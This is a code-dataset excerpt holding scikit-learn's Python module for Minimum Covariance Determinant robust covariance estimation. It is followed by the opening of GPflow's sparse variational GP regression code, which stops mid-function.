| text (stringlengths 12-1.05M) | repo_name (stringlengths 5-86) | path (stringlengths 4-191) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int32 12-1.05M) | keyword (listlengths 1-23) | text_hash (stringlengths 64) |
|---|---|---|---|---|---|---|---|
"""
Robust location and covariance estimators.
Here are implemented estimators that are resistant to outliers.
"""
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
from scipy import linalg
from scipy.stats import chi2
from . import empirical_covariance, EmpiricalCovariance
from ..utils.extmath import fast_logdet
from ..utils import check_random_state, check_array
# Minimum Covariance Determinant
# Implementation of the algorithm by Rousseeuw & Van Driessen described in
# (A Fast Algorithm for the Minimum Covariance Determinant Estimator,
# 1999, American Statistical Association and the American Society
# for Quality, TECHNOMETRICS)
# XXX Is this really a public function? It's not listed in the docs or
# exported by sklearn.covariance. Deprecate?
def c_step(X, n_support, remaining_iterations=30, initial_estimates=None,
verbose=False, cov_computation_method=empirical_covariance,
random_state=None):
"""C_step procedure described in [Rouseeuw1984]_ aiming at computing MCD.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Data set in which we look for the n_support observations whose
scatter matrix has minimum determinant.
n_support : int
Number of observations to compute the robust estimates of location
and covariance from. This parameter must be greater than
`n_samples / 2`.
remaining_iterations : int, default=30
Number of iterations to perform.
According to [Rouseeuw1999]_, two iterations are sufficient to get
close to the minimum, and we never need more than 30 to reach
convergence.
initial_estimates : tuple of shape (2,), default=None
Initial estimates of location and shape from which to run the c_step
procedure:
- initial_estimates[0]: an initial location estimate
- initial_estimates[1]: an initial covariance estimate
verbose : bool, default=False
Verbose mode.
cov_computation_method : callable, \
default=:func:`sklearn.covariance.empirical_covariance`
The function which will be used to compute the covariance.
Must return array of shape (n_features, n_features).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
        See :term:`Glossary <random_state>`.
Returns
-------
location : ndarray of shape (n_features,)
Robust location estimates.
covariance : ndarray of shape (n_features, n_features)
Robust covariance estimates.
    support : ndarray of shape (n_samples,)
        A mask for the `n_support` observations whose scatter matrix has
        minimum determinant.
    det : float
        The log-determinant (as computed by ``fast_logdet``) of the
        covariance estimate.
    dist : ndarray of shape (n_samples,)
        The Mahalanobis distances of all observations with respect to the
        returned location and covariance estimates.
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
X = np.asarray(X)
random_state = check_random_state(random_state)
return _c_step(X, n_support, remaining_iterations=remaining_iterations,
initial_estimates=initial_estimates, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state)
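# Illustrative usage sketch (hypothetical toy data; the values and the
# n_support choice are arbitrary assumptions, not part of this module):
#
#   >>> rng = np.random.RandomState(42)
#   >>> X_toy = rng.randn(100, 2)
#   >>> X_toy[:10] += 10.  # plant 10 outliers
#   >>> loc, cov, det, support, dist = c_step(X_toy, n_support=75,
#   ...                                       random_state=42)
#   >>> int(support.sum())
#   75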
def _c_step(X, n_support, random_state, remaining_iterations=30,
initial_estimates=None, verbose=False,
cov_computation_method=empirical_covariance):
n_samples, n_features = X.shape
dist = np.inf
# Initialisation
support = np.zeros(n_samples, dtype=bool)
if initial_estimates is None:
# compute initial robust estimates from a random subset
support[random_state.permutation(n_samples)[:n_support]] = True
else:
# get initial robust estimates from the function parameters
location = initial_estimates[0]
covariance = initial_estimates[1]
# run a special iteration for that case (to get an initial support)
precision = linalg.pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(1)
# compute new estimates
support[np.argsort(dist)[:n_support]] = True
X_support = X[support]
location = X_support.mean(0)
covariance = cov_computation_method(X_support)
# Iterative procedure for Minimum Covariance Determinant computation
det = fast_logdet(covariance)
# If the data already has singular covariance, calculate the precision,
# as the loop below will not be entered.
if np.isinf(det):
precision = linalg.pinvh(covariance)
previous_det = np.inf
while (det < previous_det and remaining_iterations > 0
and not np.isinf(det)):
# save old estimates values
previous_location = location
previous_covariance = covariance
previous_det = det
previous_support = support
# compute a new support from the full data set mahalanobis distances
precision = linalg.pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(axis=1)
# compute new estimates
support = np.zeros(n_samples, dtype=bool)
support[np.argsort(dist)[:n_support]] = True
X_support = X[support]
location = X_support.mean(axis=0)
covariance = cov_computation_method(X_support)
det = fast_logdet(covariance)
# update remaining iterations for early stopping
remaining_iterations -= 1
previous_dist = dist
dist = (np.dot(X - location, precision) * (X - location)).sum(axis=1)
# Check if best fit already found (det => 0, logdet => -inf)
if np.isinf(det):
results = location, covariance, det, support, dist
# Check convergence
if np.allclose(det, previous_det):
# c_step procedure converged
if verbose:
print("Optimal couple (location, covariance) found before"
" ending iterations (%d left)" % (remaining_iterations))
results = location, covariance, det, support, dist
elif det > previous_det:
# determinant has increased (should not happen)
warnings.warn("Determinant has increased; this should not happen: "
"log(det) > log(previous_det) (%.15f > %.15f). "
"You may want to try with a higher value of "
"support_fraction (current value: %.3f)."
% (det, previous_det, n_support / n_samples),
RuntimeWarning)
results = previous_location, previous_covariance, \
previous_det, previous_support, previous_dist
# Check early stopping
if remaining_iterations == 0:
if verbose:
print('Maximum number of iterations reached')
results = location, covariance, det, support, dist
return results
def select_candidates(X, n_support, n_trials, select=1, n_iter=30,
verbose=False,
cov_computation_method=empirical_covariance,
random_state=None):
"""Finds the best pure subset of observations to compute MCD from it.
The purpose of this function is to find the best sets of n_support
observations with respect to a minimization of their covariance
matrix determinant. Equivalently, it removes n_samples-n_support
observations to construct what we call a pure data set (i.e. not
containing outliers). The list of the observations of the pure
data set is referred to as the `support`.
Starting from a random support, the pure data set is found by the
c_step procedure introduced by Rousseeuw and Van Driessen in
[RV]_.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Data (sub)set in which we look for the n_support purest observations.
n_support : int
The number of samples the pure data set must contain.
This parameter must be in the range `[(n + p + 1)/2] < n_support < n`.
n_trials : int or tuple of shape (2,)
Number of different initial sets of observations from which to
run the algorithm. This parameter should be a strictly positive
integer.
Instead of giving a number of trials to perform, one can provide a
list of initial estimates that will be used to iteratively run
c_step procedures. In this case:
- n_trials[0]: array-like, shape (n_trials, n_features)
is the list of `n_trials` initial location estimates
- n_trials[1]: array-like, shape (n_trials, n_features, n_features)
is the list of `n_trials` initial covariances estimates
select : int, default=1
Number of best candidates results to return. This parameter must be
a strictly positive integer.
n_iter : int, default=30
Maximum number of iterations for the c_step procedure.
(2 is enough to be close to the final solution. "Never" exceeds 20).
This parameter must be a strictly positive integer.
verbose : bool, default=False
Control the output verbosity.
cov_computation_method : callable, \
default=:func:`sklearn.covariance.empirical_covariance`
The function which will be used to compute the covariance.
Must return an array of shape (n_features, n_features).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
        See :term:`Glossary <random_state>`.
See Also
    --------
c_step
Returns
-------
best_locations : ndarray of shape (select, n_features)
The `select` location estimates computed from the `select` best
supports found in the data set (`X`).
best_covariances : ndarray of shape (select, n_features, n_features)
The `select` covariance estimates computed from the `select`
best supports found in the data set (`X`).
best_supports : ndarray of shape (select, n_samples)
The `select` best supports found in the data set (`X`).
References
----------
.. [RV] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
random_state = check_random_state(random_state)
if isinstance(n_trials, numbers.Integral):
run_from_estimates = False
elif isinstance(n_trials, tuple):
run_from_estimates = True
estimates_list = n_trials
n_trials = estimates_list[0].shape[0]
else:
raise TypeError("Invalid 'n_trials' parameter, expected tuple or "
" integer, got %s (%s)" % (n_trials, type(n_trials)))
# compute `n_trials` location and shape estimates candidates in the subset
all_estimates = []
if not run_from_estimates:
# perform `n_trials` computations from random initial supports
for j in range(n_trials):
all_estimates.append(
_c_step(
X, n_support, remaining_iterations=n_iter, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
else:
# perform computations from every given initial estimates
for j in range(n_trials):
initial_estimates = (estimates_list[0][j], estimates_list[1][j])
all_estimates.append(_c_step(
X, n_support, remaining_iterations=n_iter,
initial_estimates=initial_estimates, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
all_locs_sub, all_covs_sub, all_dets_sub, all_supports_sub, all_ds_sub = \
zip(*all_estimates)
# find the `n_best` best results among the `n_trials` ones
index_best = np.argsort(all_dets_sub)[:select]
best_locations = np.asarray(all_locs_sub)[index_best]
best_covariances = np.asarray(all_covs_sub)[index_best]
best_supports = np.asarray(all_supports_sub)[index_best]
best_ds = np.asarray(all_ds_sub)[index_best]
return best_locations, best_covariances, best_supports, best_ds
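# Illustrative usage sketch (hypothetical toy data; trial counts are
# arbitrary assumptions): draw several random starts and keep the two best
# candidates.
#
#   >>> rng = np.random.RandomState(0)
#   >>> X_toy = rng.randn(200, 3)
#   >>> locs, covs, supports, dists = select_candidates(
#   ...     X_toy, n_support=120, n_trials=10, select=2, random_state=0)
#   >>> locs.shape, covs.shape
#   ((2, 3), (2, 3, 3))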
def fast_mcd(X, support_fraction=None,
cov_computation_method=empirical_covariance,
random_state=None):
"""Estimates the Minimum Covariance Determinant matrix.
Read more in the :ref:`User Guide <robust_covariance>`.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix, with p features and n samples.
support_fraction : float, default=None
The proportion of points to be included in the support of the raw
MCD estimate. Default is `None`, which implies that the minimum
value of `support_fraction` will be used within the algorithm:
        `(n_samples + n_features + 1) / 2`. This parameter must be in the
range (0, 1).
cov_computation_method : callable, \
default=:func:`sklearn.covariance.empirical_covariance`
The function which will be used to compute the covariance.
Must return an array of shape (n_features, n_features).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
        See :term:`Glossary <random_state>`.
Returns
-------
location : ndarray of shape (n_features,)
Robust location of the data.
covariance : ndarray of shape (n_features, n_features)
Robust covariance of the features.
support : ndarray of shape (n_samples,), dtype=bool
A mask of the observations that have been used to compute
the robust location and covariance estimates of the data set.
Notes
-----
    The FastMCD algorithm has been introduced by Rousseeuw and Van Driessen
in "A Fast Algorithm for the Minimum Covariance Determinant Estimator,
1999, American Statistical Association and the American Society
for Quality, TECHNOMETRICS".
    The principle is to compute robust estimates on random subsets before
    pooling them into larger subsets, and finally into the full data set.
Depending on the size of the initial sample, we have one, two or three
such computation levels.
Note that only raw estimates are returned. If one is interested in
the correction and reweighting steps described in [RouseeuwVan]_,
see the MinCovDet object.
References
----------
.. [RouseeuwVan] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
.. [Butler1993] R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400
"""
random_state = check_random_state(random_state)
X = check_array(X, ensure_min_samples=2, estimator='fast_mcd')
n_samples, n_features = X.shape
# minimum breakdown value
if support_fraction is None:
n_support = int(np.ceil(0.5 * (n_samples + n_features + 1)))
else:
n_support = int(support_fraction * n_samples)
# 1-dimensional case quick computation
# (Rousseeuw, P. J. and Leroy, A. M. (2005) References, in Robust
# Regression and Outlier Detection, John Wiley & Sons, chapter 4)
if n_features == 1:
if n_support < n_samples:
# find the sample shortest halves
X_sorted = np.sort(np.ravel(X))
diff = X_sorted[n_support:] - X_sorted[:(n_samples - n_support)]
halves_start = np.where(diff == np.min(diff))[0]
# take the middle points' mean to get the robust location estimate
location = 0.5 * (X_sorted[n_support + halves_start] +
X_sorted[halves_start]).mean()
support = np.zeros(n_samples, dtype=bool)
X_centered = X - location
support[np.argsort(np.abs(X_centered), 0)[:n_support]] = True
covariance = np.asarray([[np.var(X[support])]])
location = np.array([location])
# get precision matrix in an optimized way
precision = linalg.pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
else:
support = np.ones(n_samples, dtype=bool)
covariance = np.asarray([[np.var(X)]])
location = np.asarray([np.mean(X)])
X_centered = X - location
# get precision matrix in an optimized way
precision = linalg.pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
# Starting FastMCD algorithm for p-dimensional case
if (n_samples > 500) and (n_features > 1):
# 1. Find candidate supports on subsets
# a. split the set in subsets of size ~ 300
n_subsets = n_samples // 300
n_samples_subsets = n_samples // n_subsets
samples_shuffle = random_state.permutation(n_samples)
h_subset = int(np.ceil(n_samples_subsets *
(n_support / float(n_samples))))
# b. perform a total of 500 trials
n_trials_tot = 500
# c. select 10 best (location, covariance) for each subset
n_best_sub = 10
n_trials = max(10, n_trials_tot // n_subsets)
n_best_tot = n_subsets * n_best_sub
all_best_locations = np.zeros((n_best_tot, n_features))
try:
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
except MemoryError:
            # The above is too big. Let's try with something much smaller
# (and less optimal)
n_best_tot = 10
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
n_best_sub = 2
for i in range(n_subsets):
low_bound = i * n_samples_subsets
high_bound = low_bound + n_samples_subsets
current_subset = X[samples_shuffle[low_bound:high_bound]]
best_locations_sub, best_covariances_sub, _, _ = select_candidates(
current_subset, h_subset, n_trials,
select=n_best_sub, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
subset_slice = np.arange(i * n_best_sub, (i + 1) * n_best_sub)
all_best_locations[subset_slice] = best_locations_sub
all_best_covariances[subset_slice] = best_covariances_sub
# 2. Pool the candidate supports into a merged set
# (possibly the full dataset)
n_samples_merged = min(1500, n_samples)
h_merged = int(np.ceil(n_samples_merged *
(n_support / float(n_samples))))
if n_samples > 1500:
n_best_merged = 10
else:
n_best_merged = 1
# find the best couples (location, covariance) on the merged set
selection = random_state.permutation(n_samples)[:n_samples_merged]
locations_merged, covariances_merged, supports_merged, d = \
select_candidates(
X[selection], h_merged,
n_trials=(all_best_locations, all_best_covariances),
select=n_best_merged,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 3. Finally get the overall best (locations, covariance) couple
if n_samples < 1500:
# directly get the best couple (location, covariance)
location = locations_merged[0]
covariance = covariances_merged[0]
support = np.zeros(n_samples, dtype=bool)
dist = np.zeros(n_samples)
support[selection] = supports_merged[0]
dist[selection] = d[0]
else:
# select the best couple on the full dataset
locations_full, covariances_full, supports_full, d = \
select_candidates(
X, n_support,
n_trials=(locations_merged, covariances_merged),
select=1,
cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
elif n_features > 1:
# 1. Find the 10 best couples (location, covariance)
# considering two iterations
n_trials = 30
n_best = 10
locations_best, covariances_best, _, _ = select_candidates(
X, n_support, n_trials=n_trials, select=n_best, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 2. Select the best couple on the full dataset amongst the 10
locations_full, covariances_full, supports_full, d = select_candidates(
X, n_support, n_trials=(locations_best, covariances_best),
select=1, cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
return location, covariance, support, dist
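# Illustrative usage sketch (hypothetical contaminated Gaussian data): the
# raw (uncorrected, unreweighted) MCD estimates returned by fast_mcd.
#
#   >>> rng = np.random.RandomState(0)
#   >>> X_toy = rng.multivariate_normal([0., 0.], [[1., .5], [.5, 1.]],
#   ...                                 size=300)
#   >>> X_toy[:30] += 8.  # contaminate 10% of the samples
#   >>> loc, cov, support, dist = fast_mcd(X_toy, random_state=0)
#   >>> loc.shape, cov.shape, support.shape, dist.shape
#   ((2,), (2, 2), (300,), (300,))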
class MinCovDet(EmpiricalCovariance):
"""Minimum Covariance Determinant (MCD): robust estimator of covariance.
The Minimum Covariance Determinant covariance estimator is to be applied
on Gaussian-distributed data, but could still be relevant on data
drawn from a unimodal, symmetric distribution. It is not meant to be used
with multi-modal data (the algorithm used to fit a MinCovDet object is
likely to fail in such a case).
One should consider projection pursuit methods to deal with multi-modal
datasets.
Read more in the :ref:`User Guide <robust_covariance>`.
Parameters
----------
store_precision : bool, default=True
Specify if the estimated precision is stored.
assume_centered : bool, default=False
If True, the support of the robust location and the covariance
estimates is computed, and a covariance estimate is recomputed from
it, without centering the data.
        Useful to work with data whose mean is almost, but not exactly,
        zero.
If False, the robust location and covariance are directly computed
with the FastMCD algorithm without additional treatment.
support_fraction : float, default=None
The proportion of points to be included in the support of the raw
MCD estimate. Default is None, which implies that the minimum
value of support_fraction will be used within the algorithm:
        `(n_samples + n_features + 1) / 2`. The parameter must be in the range
(0, 1).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
        See :term:`Glossary <random_state>`.
Attributes
----------
raw_location_ : ndarray of shape (n_features,)
The raw robust estimated location before correction and re-weighting.
raw_covariance_ : ndarray of shape (n_features, n_features)
The raw robust estimated covariance before correction and re-weighting.
raw_support_ : ndarray of shape (n_samples,)
A mask of the observations that have been used to compute
the raw robust estimates of location and shape, before correction
and re-weighting.
location_ : ndarray of shape (n_features,)
Estimated robust location.
covariance_ : ndarray of shape (n_features, n_features)
Estimated robust covariance matrix.
precision_ : ndarray of shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
support_ : ndarray of shape (n_samples,)
A mask of the observations that have been used to compute
the robust estimates of location and shape.
dist_ : ndarray of shape (n_samples,)
Mahalanobis distances of the training set (on which :meth:`fit` is
called) observations.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
Examples
--------
>>> import numpy as np
>>> from sklearn.covariance import MinCovDet
>>> from sklearn.datasets import make_gaussian_quantiles
>>> real_cov = np.array([[.8, .3],
... [.3, .4]])
>>> rng = np.random.RandomState(0)
>>> X = rng.multivariate_normal(mean=[0, 0],
... cov=real_cov,
... size=500)
>>> cov = MinCovDet(random_state=0).fit(X)
>>> cov.covariance_
array([[0.7411..., 0.2535...],
[0.2535..., 0.3053...]])
>>> cov.location_
array([0.0813... , 0.0427...])
References
----------
.. [Rouseeuw1984] P. J. Rousseeuw. Least median of squares regression.
J. Am Stat Ass, 79:871, 1984.
.. [Rousseeuw] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
.. [ButlerDavies] R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400
"""
_nonrobust_covariance = staticmethod(empirical_covariance)
def __init__(self, *, store_precision=True, assume_centered=False,
support_fraction=None, random_state=None):
self.store_precision = store_precision
self.assume_centered = assume_centered
self.support_fraction = support_fraction
self.random_state = random_state
def fit(self, X, y=None):
"""Fits a Minimum Covariance Determinant with the FastMCD algorithm.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data, where `n_samples` is the number of samples
and `n_features` is the number of features.
y : Ignored
Not used, present for API consistency by convention.
Returns
-------
self : object
"""
X = self._validate_data(X, ensure_min_samples=2, estimator='MinCovDet')
random_state = check_random_state(self.random_state)
n_samples, n_features = X.shape
# check that the empirical covariance is full rank
if (linalg.svdvals(np.dot(X.T, X)) > 1e-8).sum() != n_features:
warnings.warn("The covariance matrix associated to your dataset "
"is not full rank")
# compute and store raw estimates
raw_location, raw_covariance, raw_support, raw_dist = fast_mcd(
X, support_fraction=self.support_fraction,
cov_computation_method=self._nonrobust_covariance,
random_state=random_state)
if self.assume_centered:
raw_location = np.zeros(n_features)
raw_covariance = self._nonrobust_covariance(X[raw_support],
assume_centered=True)
# get precision matrix in an optimized way
precision = linalg.pinvh(raw_covariance)
raw_dist = np.sum(np.dot(X, precision) * X, 1)
self.raw_location_ = raw_location
self.raw_covariance_ = raw_covariance
self.raw_support_ = raw_support
self.location_ = raw_location
self.support_ = raw_support
self.dist_ = raw_dist
# obtain consistency at normal models
self.correct_covariance(X)
# re-weight estimator
self.reweight_covariance(X)
return self
def correct_covariance(self, data):
"""Apply a correction to raw Minimum Covariance Determinant estimates.
Correction using the empirical correction factor suggested
by Rousseeuw and Van Driessen in [RVD]_.
Parameters
----------
data : array-like of shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
covariance_corrected : ndarray of shape (n_features, n_features)
Corrected robust covariance estimate.
References
----------
.. [RVD] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
"""
# Check that the covariance of the support data is not equal to 0.
# Otherwise self.dist_ = 0 and thus correction = 0.
n_samples = len(self.dist_)
n_support = np.sum(self.support_)
if n_support < n_samples and np.allclose(self.raw_covariance_, 0):
raise ValueError('The covariance matrix of the support data '
'is equal to 0, try to increase support_fraction')
correction = np.median(self.dist_) / chi2(data.shape[1]).isf(0.5)
covariance_corrected = self.raw_covariance_ * correction
self.dist_ /= correction
return covariance_corrected
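    # Note: the correction factor above rescales the raw covariance so that,
    # under a Gaussian model, the median of the robust squared Mahalanobis
    # distances matches the chi2(n_features) median; `fit` applies it
    # automatically after computing the raw estimates.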
def reweight_covariance(self, data):
"""Re-weight raw Minimum Covariance Determinant estimates.
Re-weight observations using Rousseeuw's method (equivalent to
deleting outlying observations from the data set before
computing location and covariance estimates) described
in [RVDriessen]_.
Parameters
----------
data : array-like of shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
location_reweighted : ndarray of shape (n_features,)
Re-weighted robust location estimate.
covariance_reweighted : ndarray of shape (n_features, n_features)
Re-weighted robust covariance estimate.
support_reweighted : ndarray of shape (n_samples,), dtype=bool
A mask of the observations that have been used to compute
the re-weighted robust location and covariance estimates.
References
----------
.. [RVDriessen] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
"""
n_samples, n_features = data.shape
mask = self.dist_ < chi2(n_features).isf(0.025)
if self.assume_centered:
location_reweighted = np.zeros(n_features)
else:
location_reweighted = data[mask].mean(0)
covariance_reweighted = self._nonrobust_covariance(
data[mask], assume_centered=self.assume_centered)
support_reweighted = np.zeros(n_samples, dtype=bool)
support_reweighted[mask] = True
self._set_covariance(covariance_reweighted)
self.location_ = location_reweighted
self.support_ = support_reweighted
X_centered = data - self.location_
self.dist_ = np.sum(
np.dot(X_centered, self.get_precision()) * X_centered, 1)
return location_reweighted, covariance_reweighted, support_reweighted
| kevin-intel/scikit-learn | sklearn/covariance/_robust_covariance.py | Python | bsd-3-clause | 32,366 | ["Gaussian"] | 8b53654689ac541ab6f1ff78896ed3474eab046f3fabcad86026bd389f9a7220 |
# Copyright 2016-2020 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from typing import Optional, Tuple
import numpy as np
import tensorflow as tf
from .. import likelihoods, posteriors
from ..base import InputData, MeanAndVariance, RegressionData
from ..config import default_float, default_jitter
from ..covariances.dispatch import Kuf, Kuu
from ..inducing_variables import InducingPoints
from ..kernels import Kernel
from ..mean_functions import MeanFunction
from ..utilities import add_noise_cov, to_default_float
from .model import GPModel
from .training_mixins import InternalDataTrainingLossMixin
from .util import InducingPointsLike, data_input_to_tensor, inducingpoint_wrapper
class SGPRBase_deprecated(GPModel, InternalDataTrainingLossMixin):
"""
Common base class for SGPR and GPRFITC that provides the common __init__
and upper_bound() methods.
"""
def __init__(
self,
data: RegressionData,
kernel: Kernel,
inducing_variable: InducingPointsLike,
*,
mean_function: Optional[MeanFunction] = None,
num_latent_gps: Optional[int] = None,
noise_variance: float = 1.0,
):
"""
`data`: a tuple of (X, Y), where the inputs X has shape [N, D]
and the outputs Y has shape [N, R].
`inducing_variable`: an InducingPoints instance or a matrix of
the pseudo inputs Z, of shape [M, D].
`kernel`, `mean_function` are appropriate GPflow objects
        This method only works with a Gaussian likelihood; its variance is
        initialized to `noise_variance`.
"""
likelihood = likelihoods.Gaussian(noise_variance)
X_data, Y_data = data_input_to_tensor(data)
num_latent_gps = Y_data.shape[-1] if num_latent_gps is None else num_latent_gps
super().__init__(kernel, likelihood, mean_function, num_latent_gps=num_latent_gps)
self.data = X_data, Y_data
self.num_data = X_data.shape[0]
self.inducing_variable: InducingPoints = inducingpoint_wrapper(inducing_variable)
def upper_bound(self) -> tf.Tensor:
"""
Upper bound for the sparse GP regression marginal likelihood. Note that
the same inducing points are used for calculating the upper bound, as are
used for computing the likelihood approximation. This may not lead to the
best upper bound. The upper bound can be tightened by optimising Z, just
like the lower bound. This is especially important in FITC, as FITC is
known to produce poor inducing point locations. An optimisable upper bound
can be found in https://github.com/markvdw/gp_upper.
The key reference is
::
@misc{titsias_2014,
title={Variational Inference for Gaussian and Determinantal Point Processes},
url={http://www2.aueb.gr/users/mtitsias/papers/titsiasNipsVar14.pdf},
publisher={Workshop on Advances in Variational Inference (NIPS 2014)},
author={Titsias, Michalis K.},
year={2014},
month={Dec}
}
The key quantity, the trace term, can be computed via
>>> _, v = conditionals.conditional(X, model.inducing_variable.Z, model.kernel,
... np.zeros((model.inducing_variable.num_inducing, 1)))
which computes each individual element of the trace term.
"""
X_data, Y_data = self.data
num_data = to_default_float(tf.shape(Y_data)[0])
Kdiag = self.kernel(X_data, full_cov=False)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
I = tf.eye(tf.shape(kuu)[0], dtype=default_float())
L = tf.linalg.cholesky(kuu)
A = tf.linalg.triangular_solve(L, kuf, lower=True)
AAT = tf.linalg.matmul(A, A, transpose_b=True)
B = I + AAT / self.likelihood.variance
LB = tf.linalg.cholesky(B)
# Using the Trace bound, from Titsias' presentation
c = tf.reduce_sum(Kdiag) - tf.reduce_sum(tf.square(A))
# Alternative bound on max eigenval:
corrected_noise = self.likelihood.variance + c
const = -0.5 * num_data * tf.math.log(2 * np.pi * self.likelihood.variance)
logdet = -tf.reduce_sum(tf.math.log(tf.linalg.diag_part(LB)))
err = Y_data - self.mean_function(X_data)
LC = tf.linalg.cholesky(I + AAT / corrected_noise)
v = tf.linalg.triangular_solve(LC, tf.linalg.matmul(A, err) / corrected_noise, lower=True)
quad = -0.5 * tf.reduce_sum(tf.square(err)) / corrected_noise + 0.5 * tf.reduce_sum(
tf.square(v)
)
return const + logdet + quad
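# Illustrative usage sketch (hypothetical data; since the upper bound and the
# ELBO both bracket the log marginal likelihood, the former should dominate):
#
#   >>> import numpy as np, gpflow
#   >>> X = np.random.rand(50, 1)
#   >>> Y = np.sin(6 * X) + 0.1 * np.random.randn(50, 1)
#   >>> m = gpflow.models.SGPR((X, Y), gpflow.kernels.SquaredExponential(),
#   ...                        inducing_variable=X[:10].copy())
#   >>> bool(m.upper_bound() >= m.elbo())
#   True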
class SGPR_deprecated(SGPRBase_deprecated):
"""
Sparse Variational GP regression. The key reference is
::
@inproceedings{titsias2009variational,
title={Variational learning of inducing variables in
sparse Gaussian processes},
author={Titsias, Michalis K},
booktitle={International Conference on
Artificial Intelligence and Statistics},
pages={567--574},
year={2009}
}
"""
CommonTensors = namedtuple("CommonTensors", ["A", "B", "LB", "AAT", "L"])
# type-ignore is because of changed method signature:
def maximum_log_likelihood_objective(self) -> tf.Tensor: # type: ignore
return self.elbo()
def _common_calculation(self) -> "SGPR.CommonTensors":
"""
Matrices used in log-det calculation
        :return: A, B, LB, AAT with :math:`LLᵀ = Kᵤᵤ, A = L⁻¹K_{uf}/σ,
            AAT = AAᵀ, B = AAT + I, LBLBᵀ = B`
A is M x N, B is M x M, LB is M x M, AAT is M x M
"""
x, _ = self.data
iv = self.inducing_variable
sigma_sq = self.likelihood.variance
kuf = Kuf(iv, self.kernel, x)
kuu = Kuu(iv, self.kernel, jitter=default_jitter())
L = tf.linalg.cholesky(kuu)
sigma = tf.sqrt(sigma_sq)
# Compute intermediate matrices
A = tf.linalg.triangular_solve(L, kuf, lower=True) / sigma
AAT = tf.linalg.matmul(A, A, transpose_b=True)
B = add_noise_cov(AAT, tf.cast(1.0, AAT.dtype))
LB = tf.linalg.cholesky(B)
return self.CommonTensors(A, B, LB, AAT, L)
def logdet_term(self, common: "SGPR.CommonTensors") -> tf.Tensor:
"""
Bound from Jensen's Inequality:
.. math::
            \log |K + \sigma^2 I| \le \log |Q + \sigma^2 I|
            + N \log\left(1 + \mathrm{tr}(K - Q) / (\sigma^2 N)\right)
:param common: A named tuple containing matrices that will be used
:return: log_det, lower bound on -.5 * output_dim * log |K + σ²I|
"""
LB = common.LB
AAT = common.AAT
x, y = self.data
num_data = to_default_float(tf.shape(x)[0])
outdim = to_default_float(tf.shape(y)[1])
kdiag = self.kernel(x, full_cov=False)
sigma_sq = self.likelihood.variance
# tr(K) / σ²
trace_k = tf.reduce_sum(kdiag) / sigma_sq
# tr(Q) / σ²
trace_q = tf.reduce_sum(tf.linalg.diag_part(AAT))
# tr(K - Q) / σ²
trace = trace_k - trace_q
# 0.5 * log(det(B))
half_logdet_b = tf.reduce_sum(tf.math.log(tf.linalg.diag_part(LB)))
# N * log(σ²)
log_sigma_sq = num_data * tf.math.log(sigma_sq)
